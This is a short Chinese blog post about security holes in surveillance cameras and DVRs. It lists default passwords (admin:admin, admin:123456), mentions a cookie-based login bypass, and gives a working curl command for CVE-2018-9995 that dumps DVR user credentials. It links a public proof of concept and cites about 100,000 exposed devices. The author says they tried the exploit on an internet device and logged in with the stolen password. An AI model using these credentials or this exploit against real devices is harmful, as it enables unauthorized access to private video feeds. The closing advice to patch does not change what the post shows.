当你监控自己的时候别人也许在监控着你

14年海康威视爆出了连续的漏洞Hikvision，漏洞不可怕，可怕的是漏洞使用条件太简单，连一些懂电脑的小白都能利用，于是出现了这样的事件：

一些有另类癖好的人 出售 海康威视的摄像头录像给另外一些有另类癖好的人

有多容易利用呢 em...弱口令

admin:admin 
admin:123456 

还有登陆绕过:

通过base64硬编码的方式，创建cookie绕过登陆权限审查。

如下图所示:

当初wooyun没有倒闭的时候有很多的案例 ，我也懒得找了 就拿最近的一个来做案例吧

这几天爆出来的

CVE-2018-9995

影响的设备有

Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus,  - Security. Never Compromise !! - 
Night OWL
DVR Login
HVR Login
MDVR Login

利用方式:

$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

大佬给出的poc

https://github.com/ezelf/CVE-2018-9995_dvr_credentials

通过用zoomeye搜索到大概有十来万的公网设备

自己尝试了一下 如下图:

处于隐私保护 打了一些码

拿到密码 登上 如下：

随着高科技的发展 一些隐私问题也带了出来 ，有上诉摄像头的读者快升级打补丁吧